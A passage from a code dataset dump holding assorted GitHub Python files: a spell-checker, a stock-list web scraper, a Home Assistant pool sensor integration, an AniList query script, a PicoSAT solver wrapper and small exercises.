getFullLineComments(filename)\n\n # Converts dictionary values into Set\n myCommentWordSet = convertLineToWordHelper(myCommentWordsDictionary, 'set')\n\n # Checking if all comment words are part of correctly spelled words\n # and returns a set of incorrect words\n myIncorrectWords = myCommentWordSet - myCorrectlySpelledWordSet\n\n # convertLineToWordHelper() function returns a dictionary where words are keys\n # and the line numbers of the words are the Values\n myValueKeyPairDict = convertLineToWordHelper(myCommentWordsDictionary, 'valueKey')\n myLowerUpperWordsDict = convertLineToWordHelper(myCommentWordsDictionary, 'lowerUpper')\n\n # myTempDict returns the line number and the incorrect words as key value pairs\n # myOutput will sort the list elements in ascending order and returns \n myTempDict = {}\n myOutput = {}\n\n # Looping through each incorrect word and also checking if the\n # key (line number) already exist in the output dictionary.\n # If the key (line number) exists then we append the value to the existing list\n # If the key (line number) doesn't exist then we create a dictionary element\n for eachWord in myIncorrectWords :\n if(myValueKeyPairDict[(eachWord)] in myTempDict) :\n myTempDict[myValueKeyPairDict[eachWord]].append(myLowerUpperWordsDict[eachWord])\n else :\n myTempDict[myValueKeyPairDict[eachWord]] = sorted([myLowerUpperWordsDict[eachWord]])\n\n for myKey, myValue in myTempDict.items():\n myOutput[myKey] = sorted(myValue)\n # print(sorted(myValue))\n\n return myOutput\n# print(spellCheckComments('pythoncode.py', readInRealWords('linenumberwords.txt')))\n\n##================================================================\n\n\n##================================================================\ndef RobustSpellCheck(filenamePy,filenameWords):\n if(os.path.isfile(filenamePy) and os.path.isfile(filenameWords)) :\n return [0, spellCheckComments(filenamePy, readInRealWords(filenameWords))]\n elif(os.path.isfile(filenamePy)) :\n print('Could not successfully read in word list')\n return [1, {}]\n elif(os.path.isfile(filenameWords)) :\n print('Could not successfully spell check the selected file')\n return [2, {}]\n elif(not os.path.isfile(filenameWords and not os.path.isfile(filenameWords)) ) :\n print('Could not successfully check both the files')\n return [3, {}]\n\n## Unit test cases covering all the scenarios\n# print(RobustSpellCheck('pythoncode.py','linenumberwords.txt')) # Both the files are available\n# print(RobustSpellCheck('pythoncode.py','linenumber----.txt')) # World file is missing\n# print(RobustSpellCheck('pythons.pys','linenumberwords.txt')) # Python file is missing\n# print(RobustSpellCheck(' ','li nusdfsdfs.txts')) # Both the files are missing\n##================================================================\n\n\n##================================================================\ndef getCommentsHelper(inputString, quoteType) :\n# This function accepts but single and double quotes as second paramter\n# Logic: Function finds the single/double quote pairs and \n# then replaces the quotes with (|) characters. \n# This way we will find the real comment's start position.\n\n myInputString = inputString\n myQuoteType = quoteType\n myTotalIterations = int(myInputString.count(myQuoteType) / 2)\n\n for eachIteration in range(1, myTotalIterations + 1, 1) :\n myInputSubStringStartPos = myInputString.find(myQuoteType)\n myInputSubStringEndPos = myInputString.find(myQuoteType, myInputString.find(myQuoteType) + 1 ) + 1\n myInputStringLen = len(myInputString[myInputSubStringStartPos : myInputSubStringEndPos])\n myInputString = myInputString.replace(myInputString[myInputSubStringStartPos : myInputSubStringEndPos] , '|' * myInputStringLen, 1)\n\n if(myInputString.count('#') == 0) :\n return ''\n else :\n return inputString[myInputString.find('#') : ]\n##================================================================ \n\n\n##================================================================\ndef ExtractComment(s):\n return getCommentsHelper(s, '\"')\n##================================================================ \n\n\n##================================================================\ndef ExtractCommentAdvanced(s): \n if(s.count('\"')) > 0 :\n myOutputString = getCommentsHelper(s, '\"')\n elif(s.count(\"'\")) > 0 :\n myOutputString = getCommentsHelper(s, \"'\")\n elif(s.count('\"') + s.count(\"'\")) == 0 and s.count('#') > 0 :\n return s.strip()\n elif(s.count('\"') + s.count(\"'\")) == 0 and s.count('#') == 0 :\n return '' \n return myOutputString\n\n# Some unit test cases with single, double and no quotes. \n# These test cases also includes where we have some extra spaces.\n# Please uncomment below print statements to execute the test cases.\n\n# print(ExtractCommentAdvanced(' outf.write(\"/# \" + str(number) + \" #/ \" + line) #lots of hash(#) symbols here'))\n# print(ExtractCommentAdvanced(\" outf.write('/# ' + str(number) + ' #/ ' + line) #lots of hash(#) symbols here\"))\n# print(ExtractCommentAdvanced(\" #lots of hash(#) symbols here\"))\n# print(ExtractCommentAdvanced(\" '' '' #lots of hash(#) symbols here\"))\n# print(ExtractCommentAdvanced(' #lots of hash(#) symbols here'))\n# print(ExtractCommentAdvanced(' outf.write(str(number) + line'))\n##================================================================\n","repo_name":"iamdv/bbk-msc-ds-isd","sub_path":"Term2-Coursework1/term2cw1.py","file_name":"term2cw1.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20103409729","text":"# -*- coding: utf-8 -*-\n# date : 2020/05/23\n# 현재 상장된 모든 종목의 일봉 정보를 json 파일로 저장\n# naver 아래 사이트의 정보를 크롤링하여 저장\n# https://finance.naver.com/sise/sise_market_sum.nhn\n#\n# 항목변경이 안됨 초기 상태 그래도 저장\n# \n# 종목이 많아서 page로 구성되어 있음. 마지막에 page 번호를 증가시키면서 계속 검색함\n# https://finance.naver.com/sise/sise_market_sum.nhn?&page=1\n# https://finance.naver.com/sise/sise_market_sum.nhn?&page=2\n#\n# 실행결과\n# 코스닥 상승 종목 : 날짜_kosdaq_day_bong_list.txt\n# 코스피 상승 종목 : 날짜_kospi_day_bong_list.txt\n#\n\nimport time\nimport urllib.request\nimport json\nfrom bs4 import BeautifulSoup\n\n\ndef load_json_from_file(file_name) :\n try :\n with open(file_name,'r',encoding=\"cp949\") as make_file: \n data=json.load(make_file) \n make_file.close()\n except Exception as e : # 또는 except : \n data = {}\n print(e, file_name)\n return data\n\ndef save_to_file_json(file_name, data) :\n with open(file_name,'w',encoding=\"cp949\") as make_file: \n json.dump(data, make_file, ensure_ascii=False, indent=\"\\t\") \n make_file.close()\n\nTODAY = time.strftime(\"%Y%m%d\")\n\n# 특정 url에 있는 정보를 뽑아냄 \ndef get_stock_list(url, cnt) :\n title_list = []\n with urllib.request.urlopen(url) as fs :\n soup = BeautifulSoup(fs.read().decode(fs.headers.get_content_charset()), 'html.parser')\n\n prices =[]\n got_title = 0\n\n # 각 데이터는 tr로 시작\n for tr in soup.find_all('tr') :\n # title은 th로 시작\n if got_title == 0 :\n th_list = tr.find_all('th')\n if th_list != [] :\n if th_list[0].text.strip() == 'N' :\n info = {}\n for i in range(0,len(th_list)) :\n data = th_list[i].text.strip()\n title_list.append(data)\n print(i, data )\n print('')\n got_title = 1\n # 각 항목은 td로 시작\n td_list = tr.find_all('td')\n try : \n no = td_list[0].text.strip()\n if no[0] == '\\n' :\n no = no.replace('\\n','')\n # 빈줄, 라인 등 데이터가 아닌 경우도 있다.\n # 다행히 n 값에 1부터 증가하는 값이 기록되어 있으므로, 이 값이 맞으면 정상적인 데이터로 판단\n if int(no) == cnt :\n info = {}\n for i in range(0,len(td_list)) :\n data = td_list[i].text.strip()\n info[title_list[i]] = data\n if info['name'] == '2' : # 아래에 있는 페이지 정보이므로 무시\n continue\n prices.append(info)\n cnt+=1\n except :\n continue\n return prices, cnt\n\ndef day_bong_list(name) :\n # 코스피\n url1 = 'https://finance.naver.com/sise/sise_market_sum.nhn?sosok=0'\n # 코스닥\n url2 = 'https://finance.naver.com/sise/sise_market_sum.nhn?sosok=1'\n close_price_list = {'kospi':url1, 'kosdaq':url2}\n\n # 총 페이지수, 상장 종목이 늘어나면 증가할 수 있음\n close_page_list = {'kospi':32, 'kosdaq':29}\n\n cnt = 1\n prices = []\n for i in range(0, close_page_list[name]) :\n print('page ', i+1)\n url = close_price_list[name] + '&page='+str(i+1)\n ret, cnt = get_stock_list(url, cnt) \n prices += ret\n\n # 저장\n fname = TODAY+'_'+name+'_day_bong_list.txt'\n save_to_file_json(fname, prices)\n print('done ', name)\n\nprint('kosdaq 전 종목 오늘 봉 저장 시작')\nday_bong_list('kosdaq')\n\nprint('kospi 전 종목 오늘 봉 저장 시작')\nday_bong_list('kospi')\n\n\n\n# 잘 저장되어 있는지 test\nif 0 :\n fname = TODAY+'_kosdaq'+'_day_bong_list.txt'\n prices = load_json_from_file(fname)\n for p in prices :\n print(p)\n","repo_name":"multizone-quant/system-trading","sub_path":"day-bong-list.py","file_name":"day-bong-list.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"5999379198","text":"import sys\nimport logging\nfrom tandem.shared.io.base import InterfaceDataBase, InterfaceBase\n\n\nclass STDData(InterfaceDataBase):\n pass\n\n\nclass STDStreams(InterfaceBase):\n data_class = STDData\n\n def __init__(self, handler_function):\n super(STDStreams, self).__init__(handler_function)\n\n def stop(self):\n super(STDStreams, self).stop()\n sys.stdout.close()\n\n def write_io_data(self, *args, **kwargs):\n io_data, = args\n\n sys.stdout.write(io_data.get_data())\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n def _read_data(self):\n try:\n for line in sys.stdin:\n self._received_data(line)\n except:\n logging.exception(\"Exception when reading from stdin:\")\n raise\n","repo_name":"typeintandem/tandem","sub_path":"agent/tandem/agent/io/std_streams.py","file_name":"std_streams.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"72685462248","text":"class Solution(object):\n def isPowerOfFour(self, num):\n \"\"\"\n :type num: int\n :rtype: bool\n \"\"\"\n \"\"\"\n 将整数转换为二进制数,若整数是4的指数,则满足:\n 1.最高位为1,其余位为0(num & (num) ==0)\n 2.0的个数为偶数(num & 0x55555555 > 1)\n \"\"\"\n return num & (num-1) ==0 and num & 0x55555555 > 0\n\n\n\nSolution1 = Solution()\nnum = 64\nprint(Solution1.isPowerOfFour(num))","repo_name":"zazaliu/leetcode-python","sub_path":"342. Power of Four.py","file_name":"342. Power of Four.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36232897205","text":"\"\"\"Platform for sensor integration.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.core import HomeAssistant\n\nfrom .entity import PoolEquipmentEntity, NjsPCHAdata\n\nfrom homeassistant.components.sensor import SensorEntity\n\nfrom .chemistry import (\n ChemistryDemandSensor,\n ChemistrySensor,\n ChemistryTankLevel,\n ChemistryDosingStatus,\n SaltSensor,\n SaltRequiredSensor,\n SaltTargetSensor,\n CurrentOutputSensor,\n TargetOutputSensor,\n SaturationIndexSensor,\n)\nfrom .pumps import PumpPowerSensor, PumpFlowSensor, PumpSpeedSensor, PumpProgramSensor\nfrom .controller import PanelModeSensor, TempProbeSensor\nfrom .bodies import BodyTempSensor, FilterPressureSensor, FilterCleanSensor, BodyCoveredSensor\nfrom .const import (\n PoolEquipmentClass,\n PoolEquipmentModel,\n CURRENT_OUTPUT,\n DESC,\n DOMAIN,\n EVENT_AVAILABILITY,\n EVENT_CHLORINATOR,\n EVENT_PUMP,\n SALT_LEVEL,\n SALT_REQUIRED,\n SALT_TARGET,\n STATUS,\n TARGET_OUTPUT,\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Add sensors for past config_entry in HA.\"\"\"\n coordinator = hass.data[DOMAIN][config_entry.entry_id]\n\n new_devices = []\n config = coordinator.api.get_config()\n\n new_devices.append(PanelModeSensor(coordinator, config))\n if \"temps\" in config:\n units = \"F\"\n if \"units\" in config[\"temps\"]:\n units = config[\"temps\"][\"units\"][\"name\"]\n for key in config[\"temps\"]:\n if (\n key == \"air\"\n or key == \"solar\"\n or key.startswith(\"solarSensor\")\n or key.startswith(\"waterSensor\")\n ):\n new_devices.append(\n TempProbeSensor(\n coordinator=coordinator,\n key=key,\n units=units,\n )\n )\n if (\n \"bodies\" in config[\"temps\"]\n ): # We can have Nobody Nixie systems (equipment only)\n for body in list(config[\"temps\"][\"bodies\"]):\n if \"temp\" in body:\n new_devices.append(\n BodyTempSensor(coordinator=coordinator, units=units, body=body)\n )\n\n for pump in config[\"pumps\"]:\n # Pump sensors vary by type. This may need a re-visit for pump types that use a\n # number for their speed or High/Low. Such are the dual speed, superflo, and relay pumps\n if \"type\" in pump:\n pump_type = pump[\"type\"]\n if \"maxSpeed\" in pump_type:\n new_devices.append(PumpSpeedSensor(coordinator=coordinator, pump=pump))\n if \"maxFlow\" in pump_type:\n new_devices.append(PumpFlowSensor(coordinator=coordinator, pump=pump))\n if \"relays\" in pump_type:\n new_devices.append(PumpProgramSensor(coordinator=coordinator, pump=pump))\n\n if \"maxSpeed\" in pump_type or \"maxFlow\" in pump_type:\n new_devices.append(PumpPowerSensor(coordinator=coordinator, pump=pump))\n if STATUS in pump:\n new_devices.append(\n EquipmentStatusSensor(\n coordinator=coordinator,\n equipment_class=PoolEquipmentClass.PUMP,\n equipment_model=PoolEquipmentModel.PUMP,\n equipment=pump,\n event=EVENT_PUMP,\n )\n )\n for chlorinator in config[\"chlorinators\"]:\n if SALT_LEVEL in chlorinator:\n new_devices.append(\n SaltSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if CURRENT_OUTPUT in chlorinator:\n new_devices.append(\n CurrentOutputSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if TARGET_OUTPUT in chlorinator:\n new_devices.append(\n TargetOutputSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if SALT_REQUIRED in chlorinator:\n new_devices.append(\n SaltRequiredSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if SALT_TARGET in chlorinator:\n new_devices.append(\n SaltTargetSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if STATUS in chlorinator:\n new_devices.append(\n EquipmentStatusSensor(\n coordinator=coordinator,\n equipment_class=PoolEquipmentClass.CHLORINATOR,\n equipment_model=PoolEquipmentModel.CHLORINATOR,\n equipment=chlorinator,\n event=EVENT_CHLORINATOR,\n )\n )\n for chem_controller in config[\"chemControllers\"]:\n if (\n \"name\" in chem_controller\n and \"type\" in chem_controller\n and \"name\" in chem_controller[\"type\"]\n and chem_controller[\"type\"][\"name\"] != \"none\"\n ):\n if \"ph\" in chem_controller:\n chemical = chem_controller[\"ph\"]\n new_devices.append(\n ChemistrySensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n new_devices.append(\n ChemistryDemandSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n \n if chemical[\"enabled\"] is True:\n new_devices.append(\n ChemistryDosingStatus(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n if \"tank\" in chemical and \"capacity\" in chemical[\"tank\"] and chemical[\"tank\"][\"capacity\"] > 0:\n new_devices.append(\n ChemistryTankLevel(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n\n if \"orp\" in chem_controller:\n chemical = chem_controller[\"orp\"]\n new_devices.append(\n ChemistrySensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chem_controller[\"orp\"],\n )\n )\n new_devices.append(\n ChemistryDemandSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n\n if chemical[\"enabled\"] is True:\n new_devices.append(\n ChemistryDosingStatus(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n if (\n \"tank\" in chemical\n and chemical[\"doserType\"][\"name\"] != \"chlorinator\"\n and \"capacity\" in chemical[\"tank\"] and chemical[\"tank\"][\"capacity\"] > 0\n ):\n new_devices.append(\n ChemistryTankLevel(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n new_devices.append(\n SaturationIndexSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n index_name=\"lsi\",\n )\n )\n new_devices.append(\n SaturationIndexSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n index_name=\"csi\",\n )\n )\n for pool_filter in config[\"filters\"]:\n new_devices.append(\n FilterPressureSensor(coordinator=coordinator, pool_filter=pool_filter)\n )\n new_devices.append(\n FilterCleanSensor(coordinator=coordinator, pool_filter=pool_filter)\n )\n\n if new_devices:\n async_add_entities(new_devices)\n\n\nclass EquipmentStatusSensor(PoolEquipmentEntity, SensorEntity):\n \"\"\"Equipment Status Sensor for njsPC-HA\"\"\"\n\n def __init__(\n self,\n coordinator: NjsPCHAdata,\n equipment_class: PoolEquipmentClass,\n equipment_model: PoolEquipmentModel,\n equipment: Any,\n event: str,\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(\n coordinator=coordinator,\n equipment_class=equipment_class,\n data=equipment,\n )\n if STATUS in equipment and DESC in equipment[STATUS]:\n self._value = equipment[STATUS][DESC]\n self._event = event\n self._available = True\n # Below makes sure we have a name that makes sense for the entity.\n self._attr_device_class = f\"{self.equipment_name}_status\"\n self._attr_entity_category = EntityCategory.DIAGNOSTIC\n\n def _handle_coordinator_update(self) -> None:\n \"\"\"Handle updated data from the coordinator.\"\"\"\n if (\n self.coordinator.data[\"event\"] == self._event\n and self.coordinator.data[\"id\"] == self.equipment_id\n ):\n if (\n STATUS in self.coordinator.data\n and DESC in self.coordinator.data[STATUS]\n ):\n self._value = self.coordinator.data[STATUS][DESC]\n self.async_write_ha_state()\n elif self.coordinator.data[\"event\"] == EVENT_AVAILABILITY:\n self._available = self.coordinator.data[\"available\"]\n self.async_write_ha_state()\n\n @property\n def should_poll(self) -> bool:\n return False\n\n @property\n def available(self) -> bool:\n return self._available\n\n @property\n def name(self) -> str:\n \"\"\"Name of the sensor\"\"\"\n return \"Status\"\n\n @property\n def unique_id(self) -> str:\n \"\"\"ID of the sensor\"\"\"\n return f\"{self.coordinator.controller_id}_{self.equipment_class}_{self.equipment_id}_status\"\n\n @property\n def native_value(self) -> str | None:\n return self._value\n\n @property\n def icon(self) -> str:\n if self._value != \"Ok\":\n return \"mdi:alert-circle\"\n return \"mdi:check-circle\"\n","repo_name":"Crewski/njsPC-HA","sub_path":"custom_components/njspc_ha/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":11348,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"17441014509","text":"import requests\r\nimport json\r\nimport random\r\n\r\n # to-do-list:\r\n # variables for type and status, not needed for now\r\n # if 404 error on username, return error and reprompt\r\n # add error checking everywhere\r\n # implement a different comparison method\r\n # allow the user to skip an entry and come back to it later\r\n # bubble method sort will pin the same anime against each other multiple times, want to avoid this\r\n # divide parts of code into separate, distinct functions\r\n # deploy as webapp with django\r\n # save iterations by default sorting by anilist rating\r\n # sort initial array by average score\r\n\r\ndef main():\r\n #-------------------------------------------------------------------------------------------#\r\n anilistUsername = input(\"Enter your AniList username: \")\r\n query = \"\"\"\r\n query($userName: String) {\r\n MediaListCollection(userName: $userName, type: ANIME, status: COMPLETED) {\r\n lists {\r\n entries {\r\n media {\r\n title {\r\n romaji\r\n english\r\n }\r\n averageScore\r\n }\r\n }\r\n }\r\n }\r\n }\r\n \"\"\"\r\n variables = {\r\n \"userName\": anilistUsername,\r\n \"type\": \"ANIME\",\r\n \"status\": \"REPEATING\"\r\n }\r\n url = \"https://graphql.anilist.co\"\r\n response = requests.post(url, json={\"query\": query, \"variables\": variables}) # HTTP request to server\r\n if response.status_code == 200:\r\n test_data_types(response)\r\n else:\r\n raise Exception(f\"Error: {response.status_code}\")\r\n\r\ndef test_data_types(response):\r\n\r\n userAnimeList = []\r\n userAnimeListScores = []\r\n\r\n if response.status_code == 200:\r\n\r\n animeListJson = json.dumps(response.json()) # convert requests.models.Response to str\r\n animeList = json.loads(animeListJson) # convert str to dict\r\n animeListData = animeList[\"data\"][\"MediaListCollection\"][\"lists\"]\r\n\r\n for data in animeListData:\r\n entries = data[\"entries\"]\r\n # if English exists, add the English title, else add the romaji title\r\n for entry in entries:\r\n # append anime scores to different array\r\n animeTitleScore = entry[\"media\"][\"averageScore\"]\r\n userAnimeListScores.append(animeTitleScore)\r\n if entry[\"media\"][\"title\"][\"english\"] != None:\r\n animeTitle = entry[\"media\"][\"title\"][\"english\"]\r\n userAnimeList.append(animeTitle)\r\n else:\r\n animeTitle = entry[\"media\"][\"title\"][\"romaji\"]\r\n userAnimeList.append(animeTitle)\r\n # for i in sorted(userAnimeList, key=str.casefold):\r\n # print(i)\r\n else:\r\n raise Exception(f\"Error: {response.status_code}\")\r\n\r\n # -------------------------------------------------------------------\r\n random.shuffle(animeList)\r\n\r\n n = len(userAnimeList)\r\n print(n)\r\n # for i in range(n-1):\r\n # for j in range(0, (n - i - 1)):\r\n # message = userAnimeList[j] + \" or \" + userAnimeList[j + 1] + \"\\n\"\r\n # # userChoice = input(message).upper()\r\n # userChoice = random.randint(0, 1)\r\n # if userChoice == \"L\":\r\n # userAnimeList[j], userAnimeList[j + 1] = userAnimeList[j + 1], userAnimeList[j]\r\n # elif userChoice == \"R\":\r\n # pass\r\n # show top anime at the top rather than bottom\r\n # userAnimeList.reverse()\r\n for i in range(len(userAnimeList)):\r\n print(userAnimeList[i])\r\n print(userAnimeListScores[i])\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Paisanosen/python-projects","sub_path":"anime-test.py","file_name":"anime-test.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16070241549","text":"import pandas as pd\nimport os\nimport pickle as pkl\nfrom tqdm import tqdm\n\nfrom data_utils.detect_pick_and_roll import detect_pick_and_roll\nfrom data_utils.detect_handoff import detect_handoff\n\n\ndef append_snippet(possession_df, off_id, def_id, index, start, end, out_list):\n copy = possession_df.iloc[start:end].copy()\n if len(copy.index) != (end-start):\n Exception('bad indexes')\n copy.reset_index(inplace=True)\n \n out_list.append({'index': index, 'play': copy, 'off_id': off_id, 'def_id': def_id})\n\ndef generate_data(file_path, save_name):\n file_list = os.listdir(file_path)\n \n window_length = 5 # on both sides: 2 * 5 * 0.12s = 1.2s\n seq_length = 2*window_length\n minimum_time_between = 10\n \n # save pick&rolls, handoffs and others in a list\n saved_pr = []\n saved_ho = []\n saved_negatives = []\n \n # go through all files, get the prepared pickle files\n for file in tqdm(file_list):\n if file.endswith(\".pkl\"):\n load_file = file_path + \"/\" + file\n game_df = pkl.load(open(load_file, \"rb\"))\n \n # go through every possession\n for play_index, entry in game_df.iterrows():\n possession_df = entry['possession']\n T = len(possession_df.index)\n \n # label pick&rolls and handoffs\n detect_pick_and_roll(possession_df)\n detect_handoff(possession_df) \n pr_list = possession_df.index[possession_df['is_pick_and_roll'] == True].tolist()\n ho_list = possession_df.index[possession_df['is_handoff'] == True].tolist()\n \n # check if there's a pick&roll or handoff, if not add it to background class\n if len(pr_list) + len(ho_list) > 0:\n last_frame = -99\n t_frame = 0\n while t_frame < T-window_length:\n # exclude events that are very close together\n if abs(t_frame - last_frame) < minimum_time_between:\n t_frame += 1\n continue\n \n #check if whole sequence fits\n start = t_frame+1-window_length\n end = t_frame+1+window_length\n if start < 0 or end > len(possession_df.index):\n t_frame += 1\n continue\n \n if t_frame in ho_list:\n last_frame = t_frame\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, start, end, saved_ho)\n elif t_frame in pr_list:\n last_frame = t_frame\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, start, end, saved_pr)\n t_frame += 1\n else:\n # no plays of interest, make snippets for background data\n for t_frame in range(0, T-seq_length, seq_length):\n append_snippet(possession_df, entry['offense_id'], entry['defense_id'],\n play_index, \n t_frame, t_frame+seq_length, \n saved_negatives)\n \n print(f'found {len(saved_pr)} pick&rolls, {len(saved_ho)} handoffs and {len(saved_negatives)} others')\n \n pr_df = pd.DataFrame(saved_pr)\n ho_df = pd.DataFrame(saved_ho)\n negative_df = pd.DataFrame(saved_negatives)\n \n pkl.dump((pr_df, ho_df, negative_df), open(save_name, 'wb'))\n \nif __name__ == '__main__':\n generate_data('saved_data/tactics_weaklabeled.pkl')\n \n ","repo_name":"camzach/NETS-NFL","sub_path":"NETS/extract_tactics.py","file_name":"extract_tactics.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4480968312","text":"from pysmt.exceptions import SolverAPINotFound\n\ntry:\n import picosat\nexcept ImportError:\n raise SolverAPINotFound\n\nfrom six.moves import xrange\nfrom six import iteritems\n\nimport pysmt.logics\nfrom pysmt import typing as types\nfrom pysmt.solvers.solver import Solver\nfrom pysmt.solvers.eager import EagerModel\nfrom pysmt.rewritings import CNFizer\nfrom pysmt.decorators import clear_pending_pop, catch_conversion_error\nfrom pysmt.exceptions import ConvertExpressionError\n\n\nclass PicosatSolver(Solver):\n \"\"\"PicoSAT solver\"\"\"\n\n LOGICS = [ pysmt.logics.QF_BOOL ]\n\n def __init__(self, environment, logic, **options):\n Solver.__init__(self,\n environment=environment,\n logic=logic,\n **options)\n\n self.mgr = environment.formula_manager\n self.pico = picosat.picosat_init()\n self.converter = None\n self.cnfizer = CNFizer(environment=environment)\n self.latest_model = None\n self._var_ids = {}\n\n\n def _get_var_id(self, symbol):\n if not symbol.is_symbol(types.BOOL):\n raise ConvertExpressionError(\"No theory terms are supported in PicoSAT\")\n\n if symbol in self._var_ids:\n return self._var_ids[symbol]\n else:\n vid = picosat.picosat_inc_max_var(self.pico)\n self._var_ids[symbol] = vid\n return vid\n\n\n @clear_pending_pop\n def reset_assertions(self):\n picosat.picosat_reset(self.pico)\n self.pico = picosat.picosat_init()\n\n @clear_pending_pop\n def declare_variable(self, var):\n # no need to declare variables\n pass\n\n def _get_pico_lit(self, lit):\n mult = 1\n var = lit\n if lit.is_not():\n mult = -1\n var = lit.arg(0)\n\n vid = self._get_var_id(var)\n return vid * mult\n\n\n @clear_pending_pop\n @catch_conversion_error\n def add_assertion(self, formula, named=None):\n # First, we get rid of True/False constants\n formula = formula.simplify()\n if formula.is_false():\n picosat.picosat_add(self.pico, 0)\n elif not formula.is_true():\n cnf = self.cnfizer.convert(formula)\n self._add_cnf_assertion(cnf)\n\n def _add_cnf_assertion(self, cnf):\n for clause in cnf:\n for lit in clause:\n v = self._get_pico_lit(lit)\n picosat.picosat_add(self.pico, v)\n picosat.picosat_add(self.pico, 0)\n\n @clear_pending_pop\n @catch_conversion_error\n def solve(self, assumptions=None):\n if assumptions is not None:\n cnf = []\n for a in assumptions:\n cnf += self.cnfizer.convert(a)\n\n missing = []\n for clause in cnf:\n if len(clause) == 1:\n v = self._get_pico_lit(next(iter(clause)))\n picosat.picosat_assume(self.pico, v)\n else:\n missing.append(clause)\n\n if len(missing) > 0:\n self.push()\n self._add_cnf_assertion(missing)\n self.pending_pop = True\n\n res = picosat.picosat_sat(self.pico, -1)\n if res == picosat.PICOSAT_SATISFIABLE:\n self.latest_model = self.get_model()\n return True\n else:\n self.latest_model = None\n return False\n\n\n def get_value(self, item):\n if self.latest_model is None:\n self.get_model()\n return self.latest_model.get_value(item)\n\n\n def get_model(self):\n assignment = {}\n for var, vid in iteritems(self._var_ids):\n v = picosat.picosat_deref(self.pico, vid)\n if v == 0:\n assert False\n\n value = self.mgr.Bool(v == 1)\n assignment[var] = value\n\n return EagerModel(assignment=assignment,\n environment=self.environment)\n\n @clear_pending_pop\n def push(self, levels=1):\n for _ in xrange(levels):\n picosat.picosat_push(self.pico)\n\n @clear_pending_pop\n def pop(self, levels=1):\n for _ in xrange(levels):\n picosat.picosat_pop(self.pico)\n\n def _exit(self):\n picosat.picosat_reset(self.pico)\n","repo_name":"Sahanduiuc/pysmt","sub_path":"pysmt/solvers/pico.py","file_name":"pico.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"16144407541","text":"#Escribe una función que cuente el número de vocales en una cadena dada.\ncontador = 0\n\ndef vocales(a):\n\tglobal contador\n\tfor x in a:\n\t\tif (x == \"a\") or (x == \"e\") or (x == \"i\") or (x == \"o\") or (x == \"u\"):\n\t\t\tcontador += 1\n\tprint(contador)\n\ncadena = input(\"Ingresa una cadena:\")\nvocales(cadena)\n\n","repo_name":"arianafm/Python","sub_path":"Tareas/Tarea1/vocales.py","file_name":"vocales.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27867900983","text":"#Modulo\nfrom tkinter import *\n\n#Aba\naba = Tk()\n\n#Title\naba.title('Fill')\n\n#Geometry\naba.geometry('400x400+100+100')\n\n#Background\naba['bg'] = \"Black\"\n\n#Label\nlb1 = Label(aba, text=\"LB1\", bg=\"white\")\nlb2 = Label(aba, text=\"LB2\", bg=\"red\")\nlb3 = Label(aba, text=\"LB3\", bg=\"yellow\")\nlb4 = Label(aba, text=\"LB4\", bg=\"blue\")\n\n#Expand\n#Define as areas em igualdade, alem de reajustar automaticamente a tel caso precise\nlb1.pack(side=TOP, fill=BOTH, expand=1)\nlb2.pack(side=TOP, fill=BOTH, expand=1)\nlb3.pack(side=TOP, fill=BOTH, expand=1)\nlb4.pack(side=TOP, fill=BOTH, expand=1)\n\n#Main Loop\naba.mainloop()\n","repo_name":"guilhermeG23/AulasPythonGuanabara","sub_path":"Tkinter/Expand.py","file_name":"Expand.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23627290897","text":"# -*- coding: 